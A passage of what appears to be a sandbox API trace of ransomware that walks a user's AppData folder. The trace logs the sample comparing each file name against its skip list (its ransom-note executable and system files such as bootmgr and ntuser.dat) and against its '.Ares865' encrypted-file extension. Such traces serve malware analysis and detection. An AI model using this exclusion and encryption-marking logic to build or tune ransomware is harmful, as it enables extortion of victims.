lpString2="windows") returned -1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", lpString2="bootmgr") returned -1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", lpString2="temp") returned -1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", lpString2="pagefile.sys") returned -1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", lpString2="boot") returned -1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", lpString2="ids.txt") returned -1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", lpString2="ntuser.dat") returned -1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", lpString2="perflogs") returned -1 [0109.174] lstrcmpiW (lpString1="1ddGr.gif.Ares865", lpString2="MSBuild") returned -1 [0109.174] lstrlenW (lpString="1ddGr.gif.Ares865") returned 17 [0109.174] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0y2JaFXisom.swf.Ares865") returned 69 [0109.174] lstrcpyW (in: lpString1=0x2cce45c, lpString2="1ddGr.gif.Ares865" | out: lpString1="1ddGr.gif.Ares865") returned="1ddGr.gif.Ares865" [0109.174] lstrlenW (lpString="1ddGr.gif.Ares865") returned 17 [0109.174] lstrlenW (lpString="Ares865") returned 7 [0109.174] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.174] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x89cbdd10, ftCreationTime.dwHighDateTime=0x1d4d07f, ftLastAccessTime.dwLowDateTime=0xdfcd5950, ftLastAccessTime.dwHighDateTime=0x1d4d4d0, ftLastWriteTime.dwLowDateTime=0x71cdf760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x55f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1rn0GLednnbEV.mp4.Ares865", cAlternateFileName="1RN0GL~1.ARE")) returned 1 [0109.174] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.174] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2="aoldtz.exe") returned -1 [0109.175] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2=".") returned 1 [0109.175] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2="..") returned 1 [0109.175] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2="windows") returned -1 [0109.175] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2="bootmgr") returned -1 [0109.175] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2="temp") returned -1 [0109.175] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2="pagefile.sys") returned -1 [0109.175] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2="boot") returned -1 [0109.175] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2="ids.txt") returned -1 [0109.175] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2="ntuser.dat") returned -1 [0109.175] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2="perflogs") returned -1 [0109.175] lstrcmpiW (lpString1="1rn0GLednnbEV.mp4.Ares865", lpString2="MSBuild") returned -1 [0109.175] lstrlenW (lpString="1rn0GLednnbEV.mp4.Ares865") returned 25 [0109.175] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1ddGr.gif.Ares865") returned 63 [0109.175] lstrcpyW (in: lpString1=0x2cce45c, lpString2="1rn0GLednnbEV.mp4.Ares865" | out: lpString1="1rn0GLednnbEV.mp4.Ares865") returned="1rn0GLednnbEV.mp4.Ares865" [0109.175] lstrlenW (lpString="1rn0GLednnbEV.mp4.Ares865") returned 25 [0109.175] lstrlenW (lpString="Ares865") returned 7 [0109.175] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.175] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9a305ca0, ftCreationTime.dwHighDateTime=0x1d4ccb3, ftLastAccessTime.dwLowDateTime=0xfc230520, ftLastAccessTime.dwHighDateTime=0x1d4d451, ftLastWriteTime.dwLowDateTime=0x71d058c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x13680, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1YQ5e.avi.Ares865", cAlternateFileName="1YQ5EA~1.ARE")) returned 1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2="aoldtz.exe") returned -1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2=".") returned 1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2="..") returned 1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2="windows") returned -1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2="bootmgr") returned -1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2="temp") returned -1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2="pagefile.sys") returned -1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2="boot") returned -1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2="ids.txt") returned -1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2="ntuser.dat") returned -1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2="perflogs") returned -1 [0109.175] lstrcmpiW (lpString1="1YQ5e.avi.Ares865", lpString2="MSBuild") returned -1 [0109.175] lstrlenW (lpString="1YQ5e.avi.Ares865") returned 17 [0109.175] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1rn0GLednnbEV.mp4.Ares865") returned 71 [0109.176] lstrcpyW (in: lpString1=0x2cce45c, lpString2="1YQ5e.avi.Ares865" | out: lpString1="1YQ5e.avi.Ares865") returned="1YQ5e.avi.Ares865" [0109.176] lstrlenW (lpString="1YQ5e.avi.Ares865") returned 17 [0109.176] lstrlenW (lpString="Ares865") returned 7 [0109.176] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.176] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x91b63140, ftCreationTime.dwHighDateTime=0x1d4cc30, ftLastAccessTime.dwLowDateTime=0x6d010bf0, ftLastAccessTime.dwHighDateTime=0x1d4cd06, ftLastWriteTime.dwLowDateTime=0x71d058c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2f10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="43mfdkhT.docx.Ares865", cAlternateFileName="43MFDK~1.ARE")) returned 1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2="aoldtz.exe") returned -1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2=".") returned 1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2="..") returned 1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2="windows") returned -1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2="bootmgr") returned -1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2="temp") returned -1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2="pagefile.sys") returned -1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2="boot") returned -1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2="ids.txt") returned -1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2="ntuser.dat") returned -1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2="perflogs") returned -1 [0109.176] lstrcmpiW (lpString1="43mfdkhT.docx.Ares865", lpString2="MSBuild") returned -1 [0109.176] lstrlenW (lpString="43mfdkhT.docx.Ares865") returned 21 [0109.176] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1YQ5e.avi.Ares865") returned 63 [0109.176] lstrcpyW (in: lpString1=0x2cce45c, lpString2="43mfdkhT.docx.Ares865" | out: lpString1="43mfdkhT.docx.Ares865") returned="43mfdkhT.docx.Ares865" [0109.176] lstrlenW (lpString="43mfdkhT.docx.Ares865") returned 21 [0109.176] lstrlenW (lpString="Ares865") returned 7 [0109.176] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.176] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x41f67590, ftCreationTime.dwHighDateTime=0x1d4c63e, ftLastAccessTime.dwLowDateTime=0xad797c60, ftLastAccessTime.dwHighDateTime=0x1d4d078, ftLastWriteTime.dwLowDateTime=0x71d058c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x158e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4p8QQ.mkv.Ares865", cAlternateFileName="4P8QQM~1.ARE")) returned 1 [0109.176] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.176] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2="aoldtz.exe") returned -1 [0109.176] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2=".") returned 1 [0109.176] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2="..") returned 1 [0109.176] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2="windows") returned -1 [0109.176] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2="bootmgr") returned -1 [0109.176] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2="temp") returned -1 [0109.176] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2="pagefile.sys") returned -1 [0109.177] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2="boot") returned -1 [0109.177] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2="ids.txt") returned -1 [0109.177] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2="ntuser.dat") returned -1 [0109.177] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2="perflogs") returned -1 [0109.177] lstrcmpiW (lpString1="4p8QQ.mkv.Ares865", lpString2="MSBuild") returned -1 [0109.177] lstrlenW (lpString="4p8QQ.mkv.Ares865") returned 17 [0109.177] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\43mfdkhT.docx.Ares865") returned 67 [0109.177] lstrcpyW (in: lpString1=0x2cce45c, lpString2="4p8QQ.mkv.Ares865" | out: lpString1="4p8QQ.mkv.Ares865") returned="4p8QQ.mkv.Ares865" [0109.177] lstrlenW (lpString="4p8QQ.mkv.Ares865") returned 17 [0109.177] lstrlenW (lpString="Ares865") returned 7 [0109.177] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.177] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcaa4f350, ftCreationTime.dwHighDateTime=0x1d4c678, ftLastAccessTime.dwLowDateTime=0x67bac150, ftLastAccessTime.dwHighDateTime=0x1d4d458, ftLastWriteTime.dwLowDateTime=0x71d2ba20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x33a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5ewENBsG0d5AW.swf.Ares865", cAlternateFileName="5EWENB~1.ARE")) returned 1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2="aoldtz.exe") returned -1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2=".") returned 1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2="..") returned 1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2="windows") returned -1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2="bootmgr") returned -1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2="temp") returned -1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2="pagefile.sys") returned -1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2="boot") returned -1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2="ids.txt") returned -1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2="ntuser.dat") returned -1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2="perflogs") returned -1 [0109.177] lstrcmpiW (lpString1="5ewENBsG0d5AW.swf.Ares865", lpString2="MSBuild") returned -1 [0109.177] lstrlenW (lpString="5ewENBsG0d5AW.swf.Ares865") returned 25 [0109.177] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\4p8QQ.mkv.Ares865") returned 63 [0109.177] lstrcpyW (in: lpString1=0x2cce45c, lpString2="5ewENBsG0d5AW.swf.Ares865" | out: lpString1="5ewENBsG0d5AW.swf.Ares865") returned="5ewENBsG0d5AW.swf.Ares865" [0109.177] lstrlenW (lpString="5ewENBsG0d5AW.swf.Ares865") returned 25 [0109.177] lstrlenW (lpString="Ares865") returned 7 [0109.177] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.177] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68ce84a0, ftCreationTime.dwHighDateTime=0x1d4d43f, ftLastAccessTime.dwLowDateTime=0x601307b0, ftLastAccessTime.dwHighDateTime=0x1d4cf20, ftLastWriteTime.dwLowDateTime=0x71d2ba20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x145e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7CxpSKLD21xo8yZpNs.mp4.Ares865", cAlternateFileName="7CXPSK~1.ARE")) returned 1 [0109.177] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.178] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2="aoldtz.exe") returned -1 [0109.178] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2=".") returned 1 [0109.178] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2="..") returned 1 [0109.178] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2="windows") returned -1 [0109.178] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2="bootmgr") returned -1 [0109.178] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2="temp") returned -1 [0109.178] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2="pagefile.sys") returned -1 [0109.178] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2="boot") returned -1 [0109.178] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2="ids.txt") returned -1 [0109.178] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2="ntuser.dat") returned -1 [0109.178] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2="perflogs") returned -1 [0109.178] lstrcmpiW (lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865", lpString2="MSBuild") returned -1 [0109.178] lstrlenW (lpString="7CxpSKLD21xo8yZpNs.mp4.Ares865") returned 30 [0109.178] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5ewENBsG0d5AW.swf.Ares865") returned 71 [0109.178] lstrcpyW (in: lpString1=0x2cce45c, lpString2="7CxpSKLD21xo8yZpNs.mp4.Ares865" | out: lpString1="7CxpSKLD21xo8yZpNs.mp4.Ares865") returned="7CxpSKLD21xo8yZpNs.mp4.Ares865" [0109.178] lstrlenW (lpString="7CxpSKLD21xo8yZpNs.mp4.Ares865") returned 30 [0109.178] lstrlenW (lpString="Ares865") returned 7 [0109.178] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.178] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x57987f30, ftCreationTime.dwHighDateTime=0x1d4d1b3, ftLastAccessTime.dwLowDateTime=0x7f0d8dd0, ftLastAccessTime.dwHighDateTime=0x1d4c948, ftLastWriteTime.dwLowDateTime=0x71d51b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x6e10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8CxiQK6E8YEe.csv.Ares865", cAlternateFileName="8CXIQK~1.ARE")) returned 1 [0109.178] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.178] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2="aoldtz.exe") returned -1 [0109.178] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2=".") returned 1 [0109.178] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2="..") returned 1 [0109.178] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2="windows") returned -1 [0109.178] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2="bootmgr") returned -1 [0109.178] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2="temp") returned -1 [0109.178] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2="pagefile.sys") returned -1 [0109.178] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2="boot") returned -1 [0109.178] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2="ids.txt") returned -1 [0109.179] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2="ntuser.dat") returned -1 [0109.179] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2="perflogs") returned -1 [0109.179] lstrcmpiW (lpString1="8CxiQK6E8YEe.csv.Ares865", lpString2="MSBuild") returned -1 [0109.179] lstrlenW (lpString="8CxiQK6E8YEe.csv.Ares865") returned 24 [0109.179] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7CxpSKLD21xo8yZpNs.mp4.Ares865") returned 76 [0109.179] lstrcpyW (in: lpString1=0x2cce45c, lpString2="8CxiQK6E8YEe.csv.Ares865" | out: lpString1="8CxiQK6E8YEe.csv.Ares865") returned="8CxiQK6E8YEe.csv.Ares865" [0109.179] lstrlenW (lpString="8CxiQK6E8YEe.csv.Ares865") returned 24 [0109.179] lstrlenW (lpString="Ares865") returned 7 [0109.179] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.179] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x50aa52e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x50aa52e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2="aoldtz.exe") returned -1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2=".") returned 1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2="..") returned 1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2="windows") returned -1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2="bootmgr") returned -1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2="temp") returned -1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2="pagefile.sys") returned -1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2="boot") returned -1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2="ids.txt") returned -1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2="ntuser.dat") returned -1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2="perflogs") returned -1 [0109.179] lstrcmpiW (lpString1="Adobe", lpString2="MSBuild") returned -1 [0109.179] lstrlenW (lpString="Adobe") returned 5 [0109.179] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\8CxiQK6E8YEe.csv.Ares865") returned 70 [0109.179] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Adobe" | out: lpString1="Adobe") returned="Adobe" [0109.179] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0109.179] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e4710 [0109.179] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0109.179] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd1c13a50, ftCreationTime.dwHighDateTime=0x1d4d199, ftLastAccessTime.dwLowDateTime=0x8528b7f0, ftLastAccessTime.dwHighDateTime=0x1d4cca7, ftLastWriteTime.dwLowDateTime=0x71d51b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x16950, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bGBN8_H.mp3.Ares865", cAlternateFileName="BGBN8_~1.ARE")) returned 1 [0109.179] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.179] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2="aoldtz.exe") returned 1 [0109.179] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2=".") returned 1 [0109.180] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2="..") returned 1 [0109.180] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2="windows") returned -1 [0109.180] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2="bootmgr") returned -1 [0109.180] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2="temp") returned -1 [0109.180] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2="pagefile.sys") returned -1 [0109.180] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2="boot") returned -1 [0109.180] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2="ids.txt") returned -1 [0109.180] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2="ntuser.dat") returned -1 [0109.180] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2="perflogs") returned -1 [0109.180] lstrcmpiW (lpString1="bGBN8_H.mp3.Ares865", lpString2="MSBuild") returned -1 [0109.180] lstrlenW (lpString="bGBN8_H.mp3.Ares865") returned 19 [0109.180] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe") returned 51 [0109.180] lstrcpyW (in: lpString1=0x2cce45c, lpString2="bGBN8_H.mp3.Ares865" | out: lpString1="bGBN8_H.mp3.Ares865") returned="bGBN8_H.mp3.Ares865" [0109.180] lstrlenW (lpString="bGBN8_H.mp3.Ares865") returned 19 [0109.180] lstrlenW (lpString="Ares865") returned 7 [0109.180] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.180] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd11debb0, ftCreationTime.dwHighDateTime=0x1d4cc86, ftLastAccessTime.dwLowDateTime=0xe6b9720, ftLastAccessTime.dwHighDateTime=0x1d4c8a8, ftLastWriteTime.dwLowDateTime=0x71d77ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x178f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", cAlternateFileName="C8I0-F~1.ARE")) returned 1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2="aoldtz.exe") returned 1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2=".") returned 1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2="..") returned 1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2="windows") returned -1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2="bootmgr") returned 1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2="temp") returned -1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2="pagefile.sys") returned -1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2="boot") returned 1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2="ids.txt") returned -1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2="ntuser.dat") returned -1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2="perflogs") returned -1 [0109.180] lstrcmpiW (lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865", lpString2="MSBuild") returned -1 [0109.180] lstrlenW (lpString="c8I0-fHNFgj2G8UmsIR.m4a.Ares865") returned 31 [0109.180] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\bGBN8_H.mp3.Ares865") returned 65 [0109.180] lstrcpyW (in: lpString1=0x2cce45c, lpString2="c8I0-fHNFgj2G8UmsIR.m4a.Ares865" | out: lpString1="c8I0-fHNFgj2G8UmsIR.m4a.Ares865") returned="c8I0-fHNFgj2G8UmsIR.m4a.Ares865" [0109.180] lstrlenW (lpString="c8I0-fHNFgj2G8UmsIR.m4a.Ares865") returned 31 [0109.180] lstrlenW (lpString="Ares865") returned 7 [0109.181] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0109.181] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbc5740, ftCreationTime.dwHighDateTime=0x1d4cb57, ftLastAccessTime.dwLowDateTime=0x5a291e80, ftLastAccessTime.dwHighDateTime=0x1d4d40b, ftLastWriteTime.dwLowDateTime=0x71d77ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, 